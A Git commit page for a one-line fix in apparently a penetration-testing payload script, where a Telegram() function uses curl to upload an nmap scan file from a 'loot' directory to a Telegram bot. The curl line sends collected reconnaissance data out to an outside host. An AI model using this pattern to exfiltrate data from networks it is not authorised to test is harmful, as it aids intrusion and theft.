Merge pull request #38 from idarlund/patch-1

curl command fix
pull/39/head
Darren Kitchen 2021-01-14 13:21:15 -08:00 committed by GitHub
commit de14bb72f6
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 1 additions and 1 deletions

View File

@ -97,7 +97,7 @@ function run() {
function Telegram() {
# Curl magic
curl -s -X POST $URL -d chat_id=$ID_CHANEL -d text="$MENSAJE"
curl -v -F "chat_id=YOUR CHANEL ID" -F document=@$LOOT_DIR/nmap-scan_$SCAN_M.txt $URL_FILE
curl -v -F "chat_id=$ID_CHANEL" -F document=@$LOOT_DIR/nmap-scan_$SCAN_M.txt $URL_FILE
}